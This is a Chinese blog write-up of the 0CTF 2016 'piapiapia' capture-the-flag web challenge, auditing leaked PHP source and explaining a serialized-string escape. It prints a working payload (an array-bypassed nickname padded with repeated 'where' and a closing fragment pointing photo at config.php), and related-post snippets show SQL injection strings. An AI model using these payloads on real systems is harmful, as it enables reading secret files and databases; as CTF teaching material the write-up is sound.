BUCTF[0CTF 2016]piapiapia

已于 2022-05-28 15:07:45 修改
阅读量367 收藏
点赞数
文章标签: CTF 反序列化漏洞 代码审计 配置文件 安全漏洞
于 2022-05-21 18:00:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52055750/article/details/124898150
版权

[0CTF 2016]piapiapia

打开环境是个登录框,尝试了一下sql注入,发现并无任何用处。
于是扫描目录,发现了个/www.zip。
在这里插入图片描述

开始代码审计:
在config.php中看到了flag,但是flag是不可见的。
profile.php:
反序列化unserialize()
读取文件**file_get_contents()**应该可以利用。记录一下
如果$profile[‘photo’]是config.php就可以读取到了

else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>

register.php页面和index.php页面作为注册登陆,没发现什么明显利用点。
在update.php页面中:

if($_SESSION['username'] == null) {
		die('Login First');	
	}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}

首先通过SESSION验证登陆状态,然后根据正则表达式过滤传入的数据。
仔细观察,其中对nickname的验证与之前不同,此处通过strlen()验证了长度不能超过10
此处可以通过数组绕过限制。
在最后调用update_profile()时调用了**serialize()**函数,推测其可能存在反序列化漏洞,在class.php页面中查找update_profile()函数:

	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);

其中filter()和update()函数

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

其基本逻辑为:

正则表达式过滤提交的参数
序列化变量$profile
将非法值替换为hacker

经过查询,可以使用反序列化字符串逃逸
首先在register.php页面随意注册一个用户:
成功登陆后,进入到update.php页面:
随便写数据 抓包
在这里插入图片描述根据update.php将phone,email,nickname,phtot序列化了

<?php
	$profile['phone'] = '1111111111';
	$profile['email'] = '1111111111@qq.com';
	$profile['nickname'] = 'aaaaa';
	$profile['photo'] = 'upload/f3ccdd27d2000e3f9255a7e3e2c48800';

	var_dump(serialize($profile));
?>

序列化后

string(159) "a:4:{s:5:"phone";s:10:"1111111111";s:5:"email";s:17:"1111111111@qq.com";s:8:"nickname";s:5:"aaaaa";s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}"

要使photo的值为config.php
nickname前面s的值无法更改,所以在最后构造一个闭合,而且要使nickname为数组绕过长度的限制。

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');
数组即可绕过:
nickname[]=

那么$profile就是这样了:
$profile = a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@q.com";s:8:"nickname";a:1:{i:0;s:5:"aaaaa"};s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}

要让最后photo的值被丢弃,使执行的反序列化为**“;}s:5:“photo”;s:10:“config.php”;}**
若想拼接进反序列化字符串中,还需经过filter()函数过滤:
其中”;}s:5:“photo”;s:10:“config.php”;}长度为34,所以需要额外34位,所以在写入where时,被替换为hacker,字符串长度+1
将nickname修改为数组类型,并尝试构造payload:

nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

$profile = a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@q.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere"};s:5:"photo";s:10:"config.php";}"};s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述参考链接:
https://blog.csdn.net/zz_Caleb/article/details/96777110

本人菜鸟一枚,如果有什么错误的地方,还请大佬指出,共同进步!

J1_AN9
关注
CTF题之BUUCTF系列:BUUCTF Misc 你竟然赶我走
一只小蜜蜂的博客
07-31 3448
一、名称 BUUCTF Misc 你竟然赶我走 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个jpg文件 打开图片如下: 三、解题步骤1、方法一: 使用winhex工具打开biubiu.jpg文件,查看一下内部结构 文档最后面显示出了flag值为 flag{stego_is_s0_bor1ing} 2、方法二: 使用StegSolve工具打开,Analyse--File Format--获得右图结果 文档左下角显示出flag值为...
[0CTF 2016]piapiapia WP(详细)
qq_43622442的博客
04-25 4404
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样,御剑线程开1,不管有没有压缩文件,统统扫不到- -但是可以扫出来普通的php文件,dirsearch要加延迟和调线程,不然...
BUUCTF(web刷题记录一)
nareku的博客
04-16 8881
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
CTF靶场之BUUCTF介绍
最新发布
康师父Blog
09-09 319
需要注册一下,感兴趣的同学可以注册尝试一下,该靶场也会更新最新的CTF赛事题目、由简单到难,适合全方位的练习,目前该靶场共分为几个部分:Basic(基础)、Crypto(加密)、DASBOOK(刷题书)、Misc(杂项)、是Nu1L Team为方便读者打造的免费平台)、Pwn(漏洞利用)、Real(实际会遇到的漏洞)、Reverse(逆向)、Web(网络)、加固题(各个赛事的经典案利)。接下来的一段时间我们就从基础开始进行打靶场,初学小菜鸟,有不对的地方还请指导。
Buuctf部分题解
weixin_53549425的博客
09-18 2380
这里写目录标题[极客大挑战 2019]Http1[极客大挑战 2019]Knife1[极客大挑战 2019]Upload1buuctf_phpBuuctf__[SUCTF 2019]CheckIn 1 [极客大挑战 2019]Http1 老规矩,查看源代码 <!-- Two --> <section id="two" class="wrapper alt style2">
BUUCTF刷题笔记
追求卓越,技术流~
03-24 6902
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1‘,看看返回的结果 返回结果说明这个是字符型的SQL注入 下面我们来进行一下注释 发现是这个结果,所以肯定了我们的猜测 下面要进行的是对其中的列进行爆破 输入: 1' order by 3 # 可以看到再其中没有or 我们采取的是对其进行重复的拼写进行绕过后台过滤 输入: 1’ oorrder by 3#`
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
BUUCTF--[0CTF 2016]piapiapia
qq_43054896的博客
05-01 1199
一、[0CTF 2016]piapiapia 1、dirsearch扫出了了www.zip压缩包 2、审计代码,在config.php中有变量flag,但为空,flag应该在服务器的config.php文件中,要找漏洞读取服务器的flag 3、审计代码,有注册功能,且代码中要求必须注册才能进行其后的操作;update.php中对用户填写的信息进行了一些限制,且将信息序列化保存,除此之外clas...
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6548
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6695
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF刷题(前12道)
像初雪一样自由洒落
04-04 1127
哈哈哈,我又来刷题了,看了下BUUCTF上面的pwn题还真多。。。 test_your_nc ida查看,发现直接执行system,所以,直接交互就可以 //写下简单的脚本 from pwn import * p = remote('node3.buuoj.cn',28213) p.interactive() ...
BUCTF】[第一章 web入门]SQL注入-1——手工注入全解析
自知.的博客
03-11 456
BUCTF[第一章 web入门]SQL注入-1之手工注入全解析,1. 根据注入位置数据类型将sql注入分类 2. 利用order判断字段数 order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错 ?id=1' order by 3 3. 利用 union select 联合查询 将id值设置成不成立,即可探测到可利用的字段数 ?id=-1 union select 1,2,3 4. 利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名
【BUUCTF】刷题总结(基础篇)
weixin_51614272的博客
05-15 2443
目录[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Upload[极客大挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客大挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
m0_73935461的博客
04-09 3177
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
BUUCTF—Crypto(完结版本—_—)
2301_76768121的博客
03-19 2949
BUUCTF-部分Crypto wp
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 9800
BUUCTF题目Misc部分wp(持续更新)
BUUCTF_MISC题解
热门推荐
m0_52885531的博客
05-30 2万+
BUUCTF_MISC题解 第二题 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三题 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
摩丝1(BUCTF在线评测)
邓霖涛的博客
07-19 642
参考下表得出结果flag{ILOVEYOU}下载打开后一串摩斯密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值